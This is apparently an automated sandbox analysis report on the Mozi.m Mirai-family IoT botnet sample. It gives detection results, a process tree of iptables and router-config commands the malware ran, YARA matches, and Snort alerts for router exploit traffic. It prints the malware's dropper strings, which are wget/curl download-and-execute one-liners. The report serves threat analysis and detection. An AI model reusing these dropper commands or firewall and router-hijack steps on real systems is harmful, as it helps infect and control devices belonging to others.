Analysis Report Mozi.m

Overview

General Information

Sample Name: Mozi.m
Analysis ID: 336612
MD5: eec5c6c219535fba3a0492ea8118b397
SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256: 12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef

Detection

Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
HTTP GET or POST without a user agent
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

Startup

  • system is lnxubuntu1
  • Mozi.m (PID: 4564, Parent: 4517, MD5: eec5c6c219535fba3a0492ea8118b397) Arguments: /usr/bin/qemu-arm /tmp/Mozi.m
    • Mozi.m New Fork (PID: 4578, Parent: 4564)
      • Mozi.m New Fork (PID: 4580, Parent: 4578)
        • Mozi.m New Fork (PID: 4582, Parent: 4580)
        • sh (PID: 4582, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 4584, Parent: 4582)
          • killall (PID: 4584, Parent: 4582, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd utelnetd scfgmgr
        • Mozi.m New Fork (PID: 4601, Parent: 4580)
        • Mozi.m New Fork (PID: 4602, Parent: 4580)
        • Mozi.m New Fork (PID: 4603, Parent: 4580)
          • Mozi.m New Fork (PID: 4616, Parent: 4603)
          • sh (PID: 4616, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT"
            • sh New Fork (PID: 4618, Parent: 4616)
            • iptables (PID: 4618, Parent: 4616, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
              • iptables New Fork (PID: 4622, Parent: 4618)
              • modprobe (PID: 4622, Parent: 4618, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables
          • Mozi.m New Fork (PID: 4650, Parent: 4603)
          • sh (PID: 4650, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT"
            • sh New Fork (PID: 4652, Parent: 4650)
            • iptables (PID: 4652, Parent: 4650, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4653, Parent: 4603)
          • sh (PID: 4653, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT"
            • sh New Fork (PID: 4655, Parent: 4653)
            • iptables (PID: 4655, Parent: 4653, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4689, Parent: 4603)
          • sh (PID: 4689, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT"
            • sh New Fork (PID: 4699, Parent: 4689)
            • iptables (PID: 4699, Parent: 4689, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4702, Parent: 4603)
          • sh (PID: 4702, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 56870 -j ACCEPT"
            • sh New Fork (PID: 4708, Parent: 4702)
            • iptables (PID: 4708, Parent: 4702, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4728, Parent: 4603)
          • sh (PID: 4728, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT"
            • sh New Fork (PID: 4736, Parent: 4728)
            • iptables (PID: 4736, Parent: 4728, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4739, Parent: 4603)
          • sh (PID: 4739, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT"
            • sh New Fork (PID: 4742, Parent: 4739)
            • iptables (PID: 4742, Parent: 4739, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4750, Parent: 4603)
          • sh (PID: 4750, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT"
            • sh New Fork (PID: 4761, Parent: 4750)
            • iptables (PID: 4761, Parent: 4750, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT
        • Mozi.m New Fork (PID: 4607, Parent: 4580)
        • Mozi.m New Fork (PID: 4612, Parent: 4580)
        • Mozi.m New Fork (PID: 4614, Parent: 4580)
        • Mozi.m New Fork (PID: 4875, Parent: 4580)
        • sh (PID: 4875, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 4877, Parent: 4875)
          • iptables (PID: 4877, Parent: 4875, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • Mozi.m New Fork (PID: 4878, Parent: 4580)
        • sh (PID: 4878, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 4880, Parent: 4878)
          • iptables (PID: 4880, Parent: 4878, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • Mozi.m New Fork (PID: 4881, Parent: 4580)
        • sh (PID: 4881, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 4883, Parent: 4881)
          • iptables (PID: 4883, Parent: 4881, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • Mozi.m New Fork (PID: 4885, Parent: 4580)
        • sh (PID: 4885, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 4892, Parent: 4885)
          • iptables (PID: 4892, Parent: 4885, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • Mozi.m New Fork (PID: 4912, Parent: 4580)
        • sh (PID: 4912, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • Mozi.m New Fork (PID: 4925, Parent: 4580)
        • sh (PID: 4925, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • Mozi.m New Fork (PID: 4940, Parent: 4580)
        • sh (PID: 4940, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 4950, Parent: 4940)
          • iptables (PID: 4950, Parent: 4940, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • Mozi.m New Fork (PID: 4975, Parent: 4580)
        • sh (PID: 4975, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 4985, Parent: 4975)
          • iptables (PID: 4985, Parent: 4975, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • Mozi.m New Fork (PID: 5005, Parent: 4580)
        • sh (PID: 5005, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 5011, Parent: 5005)
          • iptables (PID: 5011, Parent: 5005, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • Mozi.m New Fork (PID: 5012, Parent: 4580)
        • sh (PID: 5012, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 5014, Parent: 5012)
          • iptables (PID: 5014, Parent: 5012, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • Mozi.m New Fork (PID: 5015, Parent: 4580)
        • sh (PID: 5015, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 5019, Parent: 5015)
          • iptables (PID: 5019, Parent: 5015, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • Mozi.m New Fork (PID: 5035, Parent: 4580)
        • sh (PID: 5035, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 5044, Parent: 5035)
          • iptables (PID: 5044, Parent: 5035, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • Mozi.m New Fork (PID: 5069, Parent: 4580)
        • sh (PID: 5069, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 5079, Parent: 5069)
          • iptables (PID: 5079, Parent: 5069, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • Mozi.m New Fork (PID: 5097, Parent: 4580)
        • sh (PID: 5097, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 5105, Parent: 5097)
          • iptables (PID: 5105, Parent: 5097, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • Mozi.m New Fork (PID: 5112, Parent: 4580)
        • sh (PID: 5112, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 5121, Parent: 5112)
          • iptables (PID: 5121, Parent: 5112, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • Mozi.m New Fork (PID: 5139, Parent: 4580)
        • sh (PID: 5139, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 5144, Parent: 5139)
          • iptables (PID: 5144, Parent: 5139, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • Mozi.m New Fork (PID: 5146, Parent: 4580)
        • sh (PID: 5146, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 5152, Parent: 5146)
          • iptables (PID: 5152, Parent: 5146, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • Mozi.m New Fork (PID: 5169, Parent: 4580)
        • sh (PID: 5169, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 5183, Parent: 5169)
          • iptables (PID: 5183, Parent: 5169, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • Mozi.m New Fork (PID: 5199, Parent: 4580)
        • sh (PID: 5199, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT"
          • sh New Fork (PID: 5201, Parent: 5199)
          • iptables (PID: 5201, Parent: 5199, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5202, Parent: 4580)
        • sh (PID: 5202, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT"
          • sh New Fork (PID: 5204, Parent: 5202)
          • iptables (PID: 5204, Parent: 5202, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5205, Parent: 4580)
        • sh (PID: 5205, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT"
          • sh New Fork (PID: 5207, Parent: 5205)
          • iptables (PID: 5207, Parent: 5205, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5208, Parent: 4580)
        • sh (PID: 5208, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT"
          • sh New Fork (PID: 5211, Parent: 5208)
          • iptables (PID: 5211, Parent: 5208, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5220, Parent: 4580)
        • sh (PID: 5220, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 14165 -j ACCEPT"
          • sh New Fork (PID: 5232, Parent: 5220)
          • iptables (PID: 5232, Parent: 5220, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --dport 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5254, Parent: 4580)
        • sh (PID: 5254, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT"
          • sh New Fork (PID: 5268, Parent: 5254)
          • iptables (PID: 5268, Parent: 5254, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5290, Parent: 4580)
        • sh (PID: 5290, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT"
          • sh New Fork (PID: 5303, Parent: 5290)
          • iptables (PID: 5303, Parent: 5290, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5326, Parent: 4580)
        • sh (PID: 5326, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT"
          • sh New Fork (PID: 5333, Parent: 5326)
          • iptables (PID: 5333, Parent: 5326, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT
  • upstart New Fork (PID: 4794, Parent: 3310)
  • sh (PID: 4794, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4795, Parent: 4794)
    • date (PID: 4795, Parent: 4794, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4796, Parent: 4794)
    • apport-checkreports (PID: 4796, Parent: 4794, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 4821, Parent: 3310)
  • sh (PID: 4821, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4822, Parent: 4821)
    • date (PID: 4822, Parent: 4821, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4823, Parent: 4821)
    • apport-gtk (PID: 4823, Parent: 4821, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 4848, Parent: 3310)
  • sh (PID: 4848, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4849, Parent: 4848)
    • date (PID: 4849, Parent: 4848, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4866, Parent: 4848)
    • apport-gtk (PID: 4866, Parent: 4848, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
Mozi.m | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth |
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
Mozi.m | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |
Mozi.m | JoeSecurity_Mirai_9 | Yara detected Mirai | Joe Security |
Mozi.m | JoeSecurity_Mirai_4 | Yara detected Mirai | Joe Security |

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Mirai_4 | Yara detected Mirai | Joe Security |

Dropped Files

Source | Rule | Description | Author | Strings
/usr/networks | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth |
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
/usr/networks | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |
/usr/networks | JoeSecurity_Mirai_9 | Yara detected Mirai | Joe Security |
/usr/networks | JoeSecurity_Mirai_4 | Yara detected Mirai | Joe Security |

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Mozi.m, Avira: detected
Antivirus detection for dropped file
Source: /usr/networks, Avira: detection malicious, Label: LINUX/Mirai.lldau
Multi AV Scanner detection for submitted file
Source: Mozi.m, Virustotal: Detection: 70%
Source: Mozi.m, ReversingLabs: Detection: 68%

Spreading:

Found strings indicative of a multi-platform dropper
Source: Mozi.m, String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Mozi.m, String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Mozi.m, String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Opens /proc/net/* files useful for finding connected devices and routers
Source: /tmp/Mozi.m (PID: 4603), Opens: /proc/net/route

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:47982 -> 23.44.146.105:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:47982 -> 23.44.146.105:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.44.146.105:80 -> 192.168.2.20:47982
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 83.163.237.112: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.165.139.60: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 195.229.0.147: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 38.104.123.122: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 78.54.73.174: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 67.187.218.82: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:51592 -> 35.168.169.85:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:51592 -> 35.168.169.85:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:54436 -> 107.170.200.206:80
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.99.92.197:32998 -> 192.168.2.20:14165
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.202.68.123:8080 -> 192.168.2.20:14165
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 220.77.193.240:5353 -> 192.168.2.20:14165
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.215.212.106:18221 -> 192.168.2.20:14165
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:59680 -> 115.15.161.14:8080
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:59680 -> 115.15.161.14:8080
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.190.174.8: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.84.35: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:52344 -> 107.154.165.234:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:52344 -> 107.154.165.234:80
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:49116 -> 195.154.172.83:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:49116 -> 195.154.172.83:80
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:59784 -> 158.199.197.56:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:59784 -> 158.199.197.56:80
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:45960 -> 104.97.230.229:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:45960 -> 104.97.230.229:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.97.230.229:80 -> 192.168.2.20:45960
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.140.241.117: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:52400 -> 66.49.194.21:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:52400 -> 66.49.194.21:80
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:34684 -> 203.146.142.202:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:46778 -> 23.243.117.203:8080
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:46778 -> 23.243.117.203:8080
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:34684 -> 203.146.142.202:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:36646 -> 104.238.159.33:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:36646 -> 104.238.159.33:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.164.1.124: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 185.181.181.25: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:48360 -> 54.164.156.191:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:48360 -> 54.164.156.191:80
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:50064 -> 107.20.106.251:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:50064 -> 107.20.106.251:80
